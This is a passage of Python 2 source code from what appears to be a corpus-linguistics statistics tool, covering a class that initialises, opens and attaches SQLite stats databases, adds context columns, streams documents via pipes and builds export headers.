#self.baseline_reduplication = defaultdict(lambda:defaultdict(lambda: 0) )
self._terminated = Value(c_bool, False)
self._close_db_writer = Value(c_bool, False)
#p("-666")
#self.baseline_ngramm_lenght = self._context_left + 1 +self._context_lenght
self.temporized_baseline = defaultdict(int)
self.active_threads = []
self.main_status_bar_of_insertions = False
self._timer_on_main_status_bar_was_reset = False
self._start_time_of_the_last_insertion = False
self._end_time_of_the_last_insertion = False
self._last_insertion_was_successfull = False
self.counters_attrs = defaultdict(lambda:defaultdict(dict))
#self._avaliable_scope = self._context_lenght+1
self.force_cleaning_flags = set()
self.ignored_pos = set(["URL", "U"])
self.baseline_insrt_process = False
self._text_field_name = "text"
self._id_field_name = "id"
#p("-999")
self.temporized_repl = defaultdict(list)
self.temporized_redu = defaultdict(list)
self._repls_cols = self.statsdb.col("replications")
self._redus_cols = self.statsdb.col("reduplications")
self._cleaned_tags = {
"number":":number:",
"URL":":URL:",
"symbol":":symbol:",
"mention":":mention:",
"hashtag":":hashtag:",
}
#p("-10000")
###########################INITS + Open##########################
def _init_column_index_variables(self):
self.col_index_orig = {
"repl":{colname:index for index,colname in enumerate(self.statsdb.col("replications") )},
"redu":{colname:index for index,colname in enumerate(self.statsdb.col("reduplications") )},
"baseline":{colname:index for index,colname in enumerate(self.statsdb.col("baseline") )},
}
self.col_index_min = {
"repl":{colname:index for index,colname in enumerate(Stats.min_col["repl"])},
"redu":{colname:index for index,colname in enumerate(Stats.min_col["redu"])},
"baseline":{colname:index for index,colname in enumerate(Stats.min_col["baseline"] )},
#"baseline":{colname:index for index,colname in enumerate(self.statsdb.col("baseline") )},
}
# self.col_index_repl = {colname:index for index,colname in enumerate(self.statsdb.col("replications") )}
# self.col_index_redu = {colname:index for index,colname in enumerate(self.statsdb.col("reduplications") )}
# self.col_index_baseline = {colname:index for index,colname in enumerate(self.statsdb.col("baseline") )}
# self._contextR1index = {
# "repl":self._get_col_index("contextR1", "replications"),
# "redu":self._get_col_index("contextR1", "reduplications")
# }
# self._normalized_word_index = {
# "repl":self._get_col_index("normalized_word", "replications"),
# "redu":self._get_col_index("normalized_word", "reduplications")
# }
# self._doc_id_index = {
# "repl":self._get_col_index("doc_id", "replications"),
# "redu":self._get_col_index("doc_id", "reduplications")
# }
# self._adress_index = {
# "repl":self._get_col_index("token_index", "replications"),
# "redu":self._get_col_index("start_index", "reduplications")
# }
# self._rep_id = {
# "repl":self._get_col_index("repl_id", "replications"),
# "redu":self._get_col_index("redu_id", "reduplications")
# }
def additional_attr(self, repl_up,ignore_hashtag,ignore_url,
ignore_mention,ignore_punkt,ignore_num,force_cleaning,
case_sensitiv,full_repetativ_syntagma,
min_scope_for_indexes,baseline_delimiter):
additional_attributes = {
"repl_up":repl_up,
#"log_ignored":log_ignored,
"ignore_hashtag":ignore_hashtag,
"ignore_url":ignore_url,
"ignore_mention":ignore_mention,
"ignore_punkt":ignore_punkt,
"ignore_num":ignore_num,
"force_cleaning":force_cleaning ,
"case_sensitiv":case_sensitiv,
"full_repetativ_syntagma":full_repetativ_syntagma,
"full_repetativ_syntagma": full_repetativ_syntagma,
"min_scope_for_indexes":min_scope_for_indexes,
"baseline_delimiter":baseline_delimiter,
}
return additional_attributes
def init(self, prjFolder, DBname, language, visibility, corpus_id=None,
encryption_key=False,fileName=False, version=False, stats_id=False,
context_lenght=5, full_repetativ_syntagma=False, min_scope_for_indexes=2,
repl_up=3, ignore_hashtag=False, force_cleaning=False,baseline_delimiter="|+|",
case_sensitiv=False,ignore_url=False, ignore_mention=False, ignore_punkt=False, ignore_num=False):
if self.statsdb:
self.logger.error("StatsInitError: An active Stats Instance was found. Please close already initialized/opened Stats, before new initialization.", exc_info=self._logger_traceback)
return False
if context_lenght < 3:
self.logger.error("Given Context-Length is lower as an allow minimum, which is 3.")
return False
self.statsdb = DBHandler( **self._init_attributesfor_dbhandler())
was_initialized = self.statsdb.init("stats", prjFolder, DBname, language, visibility, corpus_id=corpus_id,
encryption_key=encryption_key,fileName=fileName, version=version,
stats_id=stats_id, db_frozen=False, context_lenght=context_lenght )
if not was_initialized:
self.logger.error("StatsInit: Current Stats for following attributes wasn't initialized: 'dbtype='{}'; 'dbname'='{}; corp_id='{}'; 'stats_id'='{}'; encryption_key='{}'; .".format("stats", DBname,corpus_id, stats_id,encryption_key))
return False
if self.statsdb.exist():
self.add_context_columns( context_lenght)
additional_attributes = self.additional_attr(repl_up,ignore_hashtag,ignore_url,
ignore_mention,ignore_punkt,ignore_num,force_cleaning,
case_sensitiv,full_repetativ_syntagma,min_scope_for_indexes,baseline_delimiter)
self.statsdb.update_attrs(additional_attributes)
self.statsdb.update_attr("locked", False)
self.set_all_intern_attributes_from_db()
self.logger.settings("InitStatsDBAttributes: {}".format( instance_info(self.statsdb.get_all_attr(), attr_to_len=False, attr_to_flag=False, as_str=True)))
self.logger.debug("StatsInit: '{}'-Stats was successful initialized.".format(DBname))
self._init_column_index_variables()
self.baseline_ngramm_lenght = 1 +self._context_lenght
return True
else:
self.logger.error("StatsInit: '{}'-Stats wasn't initialized.".format(DBname), exc_info=self._logger_traceback)
return False
def close(self):
self.statsdb.close()
self.statsdb = False
self.corp = False
self._corp_info = False
self.attached_corpdb_name = False
def _close(self):
self.statsdb._close()
self.statsdb = False
self.corp = False
self._corp_info = False
self.attached_corpdb_name = False
def open(self, path_to_stats_db, encryption_key=False):
if self.statsdb:
self.logger.error("StatsInitError: An active Stats Instance was found. Please close already initialized/opened Stats, before new initialization.", exc_info=self._logger_traceback)
return False
self.statsdb = DBHandler( **self._init_attributesfor_dbhandler())
self.statsdb.connect(path_to_stats_db, encryption_key=encryption_key)
if self.statsdb.exist():
if self.statsdb.typ() != "stats":
self.logger.error("Current DB is not an StatsDB.")
self._close()
return False
self.logger.debug("StatsOpener: '{}'-Stats was successful opened.".format(os.path.basename(path_to_stats_db)))
self.set_all_intern_attributes_from_db()
self.logger.settings("OpenedStatsDBAttributes: {}".format( instance_info(self.statsdb.get_all_attr(), attr_to_len=False, attr_to_flag=False, as_str=True)))
self._init_column_index_variables()
self.baseline_ngramm_lenght = 1 +self._context_lenght
self._init_stemmer(self._language)
return True
else:
self.logger.error("StatsOpener: Unfortunately '{}'-Stats wasn't opened.".format(os.path.basename(path_to_stats_db)), exc_info=self._logger_traceback)
return False
def set_all_intern_attributes_from_db(self):
#{u'name': u'bloggerCorpus', u'created_at': u'2018-07-26 17:49:11', u'visibility': u'extern', u'version': u'1', u'corpus_id': 7614, u'typ': u'stats', u'id': 3497}
info_dict = self.info()
self._name = info_dict["name"]
self._created_at = info_dict["created_at"]
self._visibility = info_dict["visibility"]
self._version = info_dict["version"]
self._corpus_id = info_dict["corpus_id"]
self._typ = info_dict["typ"]
self._id = info_dict["id"]
self._db_frozen = info_dict["db_frozen"]
self._context_lenght = info_dict["context_lenght"]
self._language = info_dict["language"]
#self._context_lenght = info_dict["context_right"]
self._avaliable_scope = self._context_lenght+1
self._repl_up = info_dict["repl_up"]
#self._log_ignored = info_dict["log_ignored"]
self._ignore_hashtag = info_dict["ignore_hashtag"]
self._ignore_url = info_dict["ignore_url"]
self._ignore_mention = info_dict["ignore_mention"]
self._ignore_punkt = info_dict["ignore_punkt"]
self._ignore_num = info_dict["ignore_num"]
self._force_cleaning = info_dict["force_cleaning"]
self._case_sensitiv = info_dict["case_sensitiv"]
self._full_repetativ_syntagma = info_dict["full_repetativ_syntagma"]
# self._text_field_name = info_dict["text_field_name"]
# self._id_field_name = info_dict["id_field_name"]
self._min_scope_for_indexes = info_dict["min_scope_for_indexes"]
self._pos_tagger = info_dict["pos_tagger"]
self._sentiment_analyzer = info_dict["sentiment_analyzer"]
self._baseline_delimiter = info_dict["baseline_delimiter"]
#self._id_field_name = None
#self._text_field_name = None
def _get_col_index(self, col_name, table_name):
try:
return self.statsdb.col(table_name).index(col_name)
except ValueError, e:
self.logger.error("'{}'-Colum is not in the '{}'-Table.".fromat(col_name, table_name))
return False
def _init_attributesfor_dbhandler(self):
init_attributes_db_handler = {
"stop_if_db_already_exist":self._stop_if_db_already_exist,
"rewrite":self._rewrite,
"logger_level":self._logger_level,
"optimizer":self._optimizer,
"in_memory":self._in_memory,
"logger_traceback":self._logger_traceback,
"logger_folder_to_save":self._logger_folder_to_save,
"logger_usage":self._logger_usage,
"logger_save_logs":self._logger_save_logs,
"thread_safe":self._thread_safe,
"mode":self._mode,
"error_tracking":self._error_tracking,
"ext_tb":self._ext_tb,
"isolation_level":self._isolation_level,
"optimizer_page_size":self._optimizer_page_size,
"optimizer_cache_size":self._optimizer_cache_size,
"optimizer_locking_mode":self._optimizer_locking_mode,
"optimizer_synchronous":self._optimizer_synchronous,
"optimizer_journal_mode":self._optimizer_journal_mode,
"optimizer_temp_store":self._optimizer_temp_store,
"use_cash":self._use_cash,
"replace_double_items":True,
"stop_process_if_possible":self._stop_process_if_possible,
"make_backup": self._make_backup,
"lazyness_border": self._lazyness_border,
"save_settings": self._save_settings,
"save_status": self._save_status,
"log_content": self._log_content,
"clear_logger": self._clear_logger,
#_replace_double_items
}
return init_attributes_db_handler
def _init_stemmer(self, language):
if language not in Corpus.stemmer_for_languages:
self.logger.error("StemmerINIT: is failed. '{}'-language is not supported.")
return False
lan = from_ISO639_2[language]
self.stemmer = Stemmer.Stemmer(lan)
return True
def stemm(self, word):
#p(word, "word")
try:
word.decode
return self.stemmer.stemWord(word)
except:
return self.stemmer.stemWord(word[0])
def add_context_columns(self, context_lenght):
self._add_context_columns("replications", context_lenght)
self._add_context_columns("reduplications", context_lenght)
def _add_context_columns(self, table_name, context_lenght):
#p("ghjkl")
exist_columns = self.statsdb.col(table_name)
#p(exist_columns,"exist_columns", c="r")
## context left
for context_number in reversed(range(1,context_lenght+1)):
### WordCell####
name = "contextL{}".format(context_number)
exist_columns = self.statsdb.col(table_name)
if name not in exist_columns:
if self.statsdb.add_col(table_name, name, "JSON"):
self.logger.debug("'{}'-Columns was inserted into '{}'-Table. ".format(name, table_name))
else:
return False
else:
self.logger.error("'{}'-Column is already exist in the '{}'-Table. ColumnInsertion was aborted. ".format(name, table_name))
#yield False
return False
### Additional Info Col ####
name = "context_infoL{}".format(context_number)
exist_columns = self.statsdb.col(table_name)
if name not in exist_columns:
if self.statsdb.add_col(table_name, name, "JSON"):
self.logger.debug("'{}'-Columns was inserted into '{}'-Table. ".format(name, table_name))
else:
return False
else:
self.logger.error("'{}'-Column is already exist in the '{}'-Table. ColumnInsertion was aborted. ".format(name, table_name))
#yield False
return False
# context right
for context_number in range(1,context_lenght+1):
### WordCell####
name = "contextR{}".format(context_number)
if name not in exist_columns:
self.statsdb.add_col(table_name, name, "JSON")
self.logger.debug("'{}'-Columns was inserted into '{}'-Table. ".format(name, table_name))
#yield True
else:
self.logger.error("'{}'-Column is already exist in the '{}'-Table. ColumnInsertion was aborted. ".format(name, table_name))
return False
#return
### Additional Info Col ####
name = "context_infoR{}".format(context_number)
if name not in exist_columns:
self.statsdb.add_col(table_name, name, "JSON")
self.logger.debug("'{}'-Columns was inserted into '{}'-Table. ".format(name, table_name))
#yield True
else:
self.logger.error("'{}'-Column is already exist in the '{}'-Table. ColumnInsertion was aborted. ".format(name, table_name))
return False
#return
exist_columns = self.statsdb.col(table_name)
#p(exist_columns,"exist_columns", c="r")
return True
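    # Example of the resulting schema (illustrative): for context_lenght=3 the
    # loops above add the JSON columns
    #   contextL3, context_infoL3, contextL2, context_infoL2, contextL1,
    #   context_infoL1, contextR1, context_infoR1, contextR2, context_infoR2,
    #   contextR3, context_infoR3
    # to both the "replications" and the "reduplications" tables.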
#sys.exit()
def info(self):
if not self._check_stats_db_should_exist():
return False
if not self._check_db_should_be_an_stats():
return False
return self.statsdb.get_all_attr()
# def get_streams_from_corpus(self,inp_corp,stream_number,datatyp="dict"):
# row_num = inp_corp.corpdb.rownum("documents")
# rows_pro_stream = row_num/stream_number
# streams = []
# num_of_getted_items = 0
# for i in range(stream_number):
# thread_name = "Thread{}".format(i)
# if i < (stream_number-1): # for gens in between
# gen = inp_corp.corpdb.lazyget("documents",limit=rows_pro_stream, offset=num_of_getted_items,thread_name=thread_name, output=datatyp)
# num_of_getted_items += rows_pro_stream
# streams.append((thread_name,LenGen(gen, rows_pro_stream)))
# else: # for the last generator
# gen = inp_corp.corpdb.lazyget("documents",limit=-1, offset=num_of_getted_items,thread_name=thread_name, output=datatyp)
# streams.append((thread_name,LenGen(gen, row_num-num_of_getted_items)))
# return streams
#def
def get_streams_from_corpus(self,inp_corp,stream_number,datatyp="dict", size_to_fetch=1000):
row_num = inp_corp.corpdb.rownum("documents")
rows_pro_stream = row_num/stream_number
streams = []
num_of_getted_items = 0
#p((self._id_field_name, self._text_field_name))
def intern_gen(limit, offset):
#p((limit, offset))
query = u'SELECT {}, {} FROM main.documents LIMIT {} OFFSET {};'.format(self._id_field_name, self._text_field_name,limit, offset)
cur = inp_corp.corpdb._threads_cursors[thread_name].execute(query)
while True:
res = list(cur.fetchmany(size_to_fetch))
if not res:
break
for row in res:
#yield {self._id_field_name:row[0], self._text_field_name:row[1]}
yield row
# def intern_sender(pipe, gen, length, chunk_size= 10000):
# #result = pipe.recv()
# #sended_num = 0
# #was_close = False
# while True:
# command = pipe.recv()
# if command == "+":
# i = 0
# while i <= chunk_size:
# try:
# g = next(gen)
# except StopIteration:
# pipe.send(None)
# break
# #p(g, "SENDER", c="r")
# #pipe.send(next(gen))
# pipe.send(g)
# i += 1
# #sended_num += i
# pipe.send(False)
# else:
# #was_close = True
# #pipe.close()
# break
# pipe.send(None)
# pipe.send(None)
#p(num_of_getted_items,"num_of_getted_items")
for i in range(stream_number):
thread_name = "Thread{}".format(i)
parent, child = Pipe()
if i < (stream_number-1): # for gens in between
#gen = inp_corp.corpdb.lazyget("documents",limit=rows_pro_stream, offset=num_of_getted_items,thread_name=thread_name, output=datatyp)
#gen = inp_corp.corpdb.lazyget("documents",limit=rows_pro_stream, offset=num_of_getted_items,thread_name=thread_name, output=datatyp)
#p((rows_pro_stream, num_of_getted_items))
#sender = intern_sender(parent, intern_gen(rows_pro_stream, num_of_getted_items), rows_pro_stream, chunk_size= 10000)
# = LenGen(intern_gen(rows_pro_stream, num_of_getted_items), rows_pro_stream)
sender = Process(target=intern_sender, args=(parent, intern_gen(rows_pro_stream, num_of_getted_items), rows_pro_stream, 10000))
sender.start()
streams.append((thread_name,rows_pro_stream,child,sender))
num_of_getted_items += rows_pro_stream
#print num_of_getted_items, rows_pro_stream
else: # for the last generator
#gen = inp_corp.corpdb.lazyget("documents",limit=-1, offset=num_of_getted_items,thread_name=thread_name, output=datatyp)
#p((-1, num_of_getted_items))
sender = Process(target=intern_sender, args=(parent, intern_gen(-1, num_of_getted_items), row_num-num_of_getted_items, 10000))
sender.start()
#streams.append((thread_name,LenGen(intern_gen(-1, num_of_getted_items), row_num-num_of_getted_items)))
streams.append((thread_name,row_num-num_of_getted_items,child,sender))
num_of_getted_items += rows_pro_stream
return streams
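        # Consumer-side sketch (illustrative; the actual pipe protocol lives in
        # intern_sender imported from zas_rep_tools helpers, and the commented
        # variant above suggests it): each stream is a
        # (thread_name, length, child_pipe, sender_process) tuple that a worker
        # would typically drive like
        #   child.send("+")        # request the next chunk of rows
        #   row = child.recv()     # (doc_id, text) tuples, one per recv()
        #   ...                    # False ends a chunk, None ends the stream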
# query = u'SELECT {}, {} FROM main.documents LIMIT {} OFFSET {};'.format(self._id_field_name, self._text_field_name,rows_pro_stream, num_of_getted_items)
# while True:
# #p(cursor, "cursor")
# results = cursor["out_obj"].fetchmany(size_to_fetch)
# #p(results, "results")
# results = list(results)
# #p(results, "results")
# if not results:
# break
# for row in results:
# #p(row,"row")
# yield row
def _get_export_phanomena(self,repl=False, redu=False, baseline=False):
to_export = []
if repl:
to_export.append("repl")
if redu:
to_export.append("redu")
if baseline:
to_export.append("baseline")
return to_export
def _get_exporter_flags(self,repl=False, redu=False, baseline=False):
flags = []
if redu:
flags.append(True)
if repl:
flags.append(True)
if baseline:
flags.append(True)
return flags
# def _get_header(self, flags, repl=False, redu=False, baseline=False, output_table_type="exhausted", embedded_baseline=True, max_scope=False, additional_doc_cols=False):
# header_main = []
# header_additional = []
# baseline_col_names = Stats.output_tables_col_names["baseline"]
# extracted_colnames_for_repl = [item[0] for item in db_helper.default_tables["stats"]["replications"]]
# extracted_colnames_for_redu = [item[0] for item in db_helper.default_tables["stats"]["reduplications"]]
# baseline_col_names_repl = [baseline_col_names["all"],baseline_col_names["repl"]["uniq"],baseline_col_names["repl"]["exhausted"]]
# baseline_col_names_redu = [baseline_col_names["all"],baseline_col_names["redu"]["uniq"],baseline_col_names["redu"]["exhausted"]]
# #db_helper.get
# if max_scope and max_scope >1:
# header_main.append("syntagma")
# header_additional.append("syntagma")
# if len(flags) == 1:
# if repl:
# header_main = [item[0] for item in db_helper.default_tables["stats"]["replications"]]
# elif redu:
# header_main = [item[0] for item in db_helper.default_tables["stats"]["reduplications"]]
# elif baseline:
# header_main = [item[0] for item in db_helper.default_tables["stats"]["baseline"]]
# elif len(flags) == 2:
# if output_table_type == "sum":
# pass
# else:
# if repl and baseline:
# if embedded_baseline:
# #header_main.append(db_helper.tag_normalized_word)
# #extracted_colnames_for_repl.remove(db_helper.tag_normalized_word)
# extracted_colnames_for_repl.remove(db_helper.tag_normalized_word)
# header_main.append(db_helper.tag_normalized_word)
# header_main += baseline_col_names_repl
# header_main += extracted_colnames_for_repl
# else:
# header_main += extracted_colnames_for_repl
# baseline_col_names_repl.insert(0,db_helper.tag_normalized_word)
# header_additional += baseline_col_names_repl
# elif redu and baseline:
# if embedded_baseline:
# #header_main.append(db_helper.tag_normalized_word)
# extracted_colnames_for_redu.remove(db_helper.tag_normalized_word)
# header_main.append(db_helper.tag_normalized_word)
# header_main += baseline_col_names_redu
# header_main += extracted_colnames_for_redu
# else:
# header_main += extracted_colnames_for_redu
# baseline_col_names_redu.insert(0,db_helper.tag_normalized_word)
# header_additional += baseline_col_names_redu
# elif redu and repl:
# extracted_colnames_for_repl.remove(db_helper.tag_normalized_word)
# extracted_colnames_for_redu.remove(db_helper.tag_normalized_word)
# #header_main.append(db_helper.tag_normalized_word)
# header_main.append(db_helper.tag_normalized_word)
# #if embedded_baseline:
# #header_main.append(db_helper.tag_normalized_word)
# uniq_for_redu = [item for item in extracted_colnames_for_redu if item not in extracted_colnames_for_repl]
# header_main += extracted_colnames_for_repl+uniq_for_redu
# elif len(flags) == 3:
# if embedded_baseline:
# extracted_colnames_for_repl.remove(db_helper.tag_normalized_word)
# extracted_colnames_for_redu.remove(db_helper.tag_normalized_word)
# header_main.append(db_helper.tag_normalized_word)
# header_additional.append(db_helper.tag_normalized_word)
# header_additional += baseline_col_names_repl
# baseline_col_names_redu.remove(baseline_col_names["all"])
# header_additional += baseline_col_names_redu
# header_main += extracted_colnames_for_repl
# uniq_for_redu = [item for item in extracted_colnames_for_redu if item not in extracted_colnames_for_repl]
# header_main += uniq_for_redu
# else:
# extracted_colnames_for_repl.remove(db_helper.tag_normalized_word)
# extracted_colnames_for_redu.remove(db_helper.tag_normalized_word)
# header_main.append(db_helper.tag_normalized_word)
# header_main += baseline_col_names_repl
# baseline_col_names_redu.remove(baseline_col_names["all"])
# header_main += baseline_col_names_redu
# header_main += extracted_colnames_for_repl
# uniq_for_redu = [item for item in extracted_colnames_for_redu if item not in extracted_colnames_for_repl]
# header_main += uniq_for_redu
# #self.logger.error("Simultan Export for 3 Phenomena at the same time is not implemented.")
# if len(header_additional)==1:
# header_additional = []
# if header_main and header_additional:
# return header_main, header_additional
# elif header_main:
# return header_main
def _add_context_columns(self, table_name, context_lenght):
#p("ghjkl")
exist_columns = self.statsdb.col(table_name)
#p(exist_columns,"exist_columns", c="r")
## context left
for context_number in reversed(range(1,context_lenght+1)):
### WordCell####
name = "contextL{}".format(context_number)
exist_columns = self.statsdb.col(table_name)
if name not in exist_columns:
if self.statsdb.add_col(table_name, name, "JSON"):
self.logger.debug("'{}' column was inserted into the '{}' table.".format(name, table_name))
else:
return False
else:
self.logger.error("'{}' column already exists in the '{}' table. Column insertion was aborted.".format(name, table_name))
#yield False
return False
### Additional Info Col ####
name = "context_infoL{}".format(context_number)
exist_columns = self.statsdb.col(table_name)
if name not in exist_columns:
if self.statsdb.add_col(table_name, name, "JSON"):
self.logger.debug("'{}' column was inserted into the '{}' table.".format(name, table_name))
else:
return False
else:
self.logger.error("'{}' column already exists in the '{}' table. Column insertion was aborted.".format(name, table_name))
#yield False
return False
# context right
for context_number in range(1,context_lenght+1):
### WordCell####
name = "contextR{}".format(context_number)
if name not in exist_columns:
self.statsdb.add_col(table_name, name, "JSON")
self.logger.debug("'{}' column was inserted into the '{}' table.".format(name, table_name))
#yield True
else:
self.logger.error("'{}' column already exists in the '{}' table. Column insertion was aborted.".format(name, table_name))
return False
#return
### Additional Info Col ####
name = "context_infoR{}".format(context_number)
if name not in exist_columns:
self.statsdb.add_col(table_name, name, "JSON")
self.logger.debug("'{}' column was inserted into the '{}' table.".format(name, table_name))
#yield True
else:
self.logger.error("'{}' column already exists in the '{}' table. Column insertion was aborted.".format(name, table_name))
return False
#return
exist_columns = self.statsdb.col(table_name)
#p(exist_columns,"exist_columns", c="r")
return True
#sys.exit()
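# Illustrative sketch (inferred from the loops above, not from the original docs):
# for context_lenght=2 the method tries to add the JSON columns in this order:
#   contextL2, context_infoL2, contextL1, context_infoL1   (left, outermost first)
#   contextR1, context_infoR1, contextR2, context_infoR2   (right, innermost first)
# and returns False as soon as one of them already exists in the table.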
def attached_corpdb_number(self):
if not self._check_stats_db_should_exist():
return False
return len(self.statsdb.dbnames)-1
def attach_corpdb(self, path_to_corpdb, encryption_key=False):
if not self._check_stats_db_should_exist():
return False
#p(path_to_corpdb, "path_to_corpdb")
if not self.statsdb.attach(path_to_corpdb, encryption_key=encryption_key, db_name=self.corpdb_defaultname)["status"]:
self.logger.error("'{}' wasn't attached.".format(path_to_corpdb))
return False
id_from_attached_corp = self.statsdb.get_attr("id",dbname=self.corpdb_defaultname)
corp_id = self.statsdb.get_attr("corpus_id",dbname="main")
#p(())
if id_from_attached_corp != corp_id:
self.logger.error("Attached CorpDB (id='{}') is not suitable with the current StatsDB. Current StatsDB is suitable with CorpDB with id='{}'.".format(id_from_attached_corp, corp_id))
self.statsdb.detach(dbname=self.corpdb_defaultname)
return False
self.attached_corpdb_name = self.corpdb_defaultname
return True
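# Hypothetical usage sketch (the path is made up): attaching a CorpDB only
# succeeds when the corpus id stored in the StatsDB matches the id of the
# attached database:
#   if stats.attach_corpdb("/data/corpus.db"):
#       stats.attached_corpdb_number()   # -> number of attached databases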
def _get_context_cols(self, direction, context_lenght):
output = ()
if direction == "left":
for context_number in reversed(range(1,context_lenght+1)):
### WordCell####
output += ("contextL{}".format(context_number),)
### Additional Info Col ####
output += ("context_infoL{}".format(context_number),)
else:
# context right
for context_number in range(1,context_lenght+1):
### WordCell####
output += ("contextR{}".format(context_number),)
### Additional Info Col ####
output += ("context_infoR{}".format(context_number),)
return output
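# Illustrative example (derived from the loops above):
#   self._get_context_cols("left", 2)
#     -> ("contextL2", "context_infoL2", "contextL1", "context_infoL1")
#   self._get_context_cols("right", 2)
#     -> ("contextR1", "context_infoR1", "contextR2", "context_infoR2")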
def _get_header(self, repl=False, redu=False, baseline=False, output_table_type="exhausted", max_scope=False, additional_doc_cols=False, context_len_left=True, context_len_right=True,word_examples_sum_table=True):
if not self._check_stats_db_should_exist():
return False
if output_table_type == "exhausted":
return self._get_header_exhausted( repl=repl, redu=redu, baseline=baseline, additional_doc_cols=additional_doc_cols, context_len_left=context_len_left, context_len_right=context_len_right)
else:
return self._get_header_sum(repl=repl, redu=redu,word_examples_sum_table=word_examples_sum_table)
def _get_header_sum(self, repl=False, redu=False, word_examples_sum_table=True):
if repl and redu:
self.logger.error("GetSummeryHeaderError: Repl and Redu was selected in the same time. Summery Header could be created just for one Phenomen each time.")
return False
output = False
col_repls_core = ("letter", "NrOfRepl", "Occur")
col_redus_core = ("word", "ReduLength", "Occur")
if repl:
col_repls_core = col_repls_core+("Examples",) if word_examples_sum_table else col_repls_core
output = col_repls_core
if redu:
#col_redus_core = col_redus_core+("Examples",) if word_examples_sum_table else col_redus_core
output = col_redus_core
return output
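# Illustrative example (derived from the code above): the summary header is a
# flat tuple, e.g.
#   repl with word_examples_sum_table=True -> ("letter", "NrOfRepl", "Occur", "Examples")
#   redu                                   -> ("word", "ReduLength", "Occur")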
def _get_header_exhausted(self, repl=False, redu=False, baseline=False, additional_doc_cols=False, context_len_left=True, context_len_right=True):
if (repl and not baseline) or (redu and not baseline):
self.logger.error("Export is possible just with selected baseline. Please select also baseline to start the export process.")
return False
if baseline:
baseline = ()
baseline += db_helper.default_col_baseline_main
baseline += db_helper.default_col_baseline_repls_core if repl else ()
baseline += db_helper.default_col_baseline_redus_core if redu else ()
baseline += db_helper.default_col_baseline_repls_addit if repl else ()
baseline += db_helper.default_col_baseline_redus_addit if redu else ()
baseline = tuple(item[0] for item in baseline)
if repl:
repl = ()
repl += db_helper.default_col_for_rep_core
repl += db_helper.default_col_for_rep_indexes
repl += db_helper.default_col_for_rep_repl_data
repl = tuple(item[0] for item in repl)
if redu:
redu = ()
redu += db_helper.default_col_for_rep_core
redu += db_helper.default_col_for_rep_indexes
redu += db_helper.default_col_for_rep_redu_data
redu = tuple(item[0] for item in redu)
word = ()
if repl and not redu:
word += db_helper.default_col_for_repl_word_info
word += db_helper.default_col_for_rep_addit_info_word
elif not repl and redu:
word += db_helper.default_col_for_redu_word_info
word += db_helper.default_col_for_rep_addit_info_word
elif repl and redu:
word += db_helper.default_col_for_repl_word_info
word += db_helper.default_col_for_rep_addit_info_word
word = tuple(item[0] for item in word) if word else ()
document = ()
context = ()
if repl or redu:
document += (tuple(item[0] for item in db_helper.default_col_for_rep_doc_info) ,)
if additional_doc_cols:
document += (tuple(additional_doc_cols),)
else:
document += (None,)
## context left
#context += ()
avalible_context_num_in_stats = self.statsdb.get_attr("context_lenght")
if context_len_left:
context_len_left = avalible_context_num_in_stats if context_len_left is True else context_len_left
if context_len_left > avalible_context_num_in_stats:
self.logger.error("Given ContextLeft Number is higher as possible. Current StatsDB was computed for '{}'-context number. Please use one number, which are not higher as computed context number for current StatsDB.".format(context_len_left,avalible_context_num_in_stats))
return False
context += self._get_context_cols("left", context_len_left)
if context_len_right:
context_len_right = avalible_context_num_in_stats if context_len_right is True else context_len_right
if context_len_right > avalible_context_num_in_stats:
self.logger.error("Given ContextRight Number is higher as possible. Current StatsDB was computed for '{}'-context number. Please use one number, which are not higher as computed context number for current StatsDB.".format(context_len_right,avalible_context_num_in_stats))
return False
context += self._get_context_cols("right", context_len_right)
if not repl and not redu and not baseline:
return {}
else:
return {"baseline":baseline, "document":document, "word":word, "repl":repl, "redu":redu, "context":context}
def cols_exists_in_corpb(self, cols_to_check):
if not self._check_stats_db_should_exist():
return False
if not self.attached_corpdb_name:
self.logger.error("'{}' wasn't attached.".format(path_to_corpdb))
return False
cols_in_doc_tables_in_attached_corp = self.statsdb.col("documents", dbname=self.attached_corpdb_name)
for col in cols_to_check:
if col not in cols_in_doc_tables_in_attached_corp:
self.logger.error("'{}'-ColumnName wasn't found in CorpDB. Please use one of the following additional ColNames: '{}'.".format(col, cols_in_doc_tables_in_attached_corp))
return False
return True
def order_header(self,header, additional_doc_cols,export_file_type):
#p(header, "header")
if export_file_type == "csv":
wrapped_tag_pattern = "[{}]."
else:
wrapped_tag_pattern = "{}."
ordered_header = []
for table_part in Stats.header_order_to_export:
if table_part == "document":
#p(header[table_part], "header[table_part]")
try:
temp_list = list(header[table_part][0])
except:
temp_list = []
wrapped_tag = wrapped_tag_pattern.format(table_part)
ordered_header += ["{}{}".format(wrapped_tag,col) for col in temp_list ]
if additional_doc_cols:
if header[table_part][1]:
temp_list = list(header[table_part][1])
wrapped_tag = wrapped_tag_pattern.format(table_part)
ordered_header += ["{}{}".format(wrapped_tag,col) for col in temp_list ]
#p(ordered_header, "ordered_header")
else:
if header[table_part]:
for col in header[table_part]:
#p(col, "col " )
wrapped_tag = wrapped_tag_pattern.format(table_part)
ordered_header.append("{}{}".format(wrapped_tag,col))
return ordered_header
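# Illustrative example (the column name is made up for demonstration): for CSV
# the table part is wrapped in square brackets, otherwise a plain dotted prefix
# is used:
#   csv    -> "[baseline].occur_uniq"
#   other  -> "baseline.occur_uniq"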
#Stats._non_pos_tags = set(["EMOIMG", "EMOASC", "number", "symbol", "hashtag", "mention","regular"])
def export(self,path_to_export_dir, syntagma="*", repl=False, redu=False,
baseline=True, syntagma_type="lexem", sentiment=False,
fname=False, export_file_type="csv", rows_limit_in_file=1000000,
encryption_key_corp=False, output_table_type="exhausted",
additional_doc_cols=False, encryption_key_for_exported_db=False,
path_to_corpdb=False, max_scope=False, stemmed_search=False,rewrite=False,
context_len_left=True, context_len_right=True, separator_syn=" || ",
word_examples_sum_table=True,ignore_num=False,ignore_symbol=False,):
#p(locals())
#p((path_to_export_dir,syntagma,repl,redu,syntagma_type,max_scope))
export_file_type = export_file_type.lower()
fname =fname if fname else "export_{}".format(time.time())
if self.statsdb.get_attr("locked"):
self.logger.error("Current DB is still be locked. Possibly it is right now in-use from other process or the last computation-process is failed.")
return False
if export_file_type not in Exporter.supported_file_formats:
self.logger.error("ExportError: '{}'-FileType is not supported. Please use one of the following file type: '{}'.".format(export_file_type, Exporter.supported_file_formats))
return False
if output_table_type not in Stats.output_tables_types:
self.logger.error("Given Type for the outputTable ('{}') is not supported. Please select one of the following types: '{}'. ".format(output_table_type, Stats.output_tables_types))
return False
if sentiment:
if not self._sentiment_analyzer:
self.logger.error("GetterError: Sentiment wasn't computed for current CorpusDB thats why it is not possible to export Data with sentiment.")
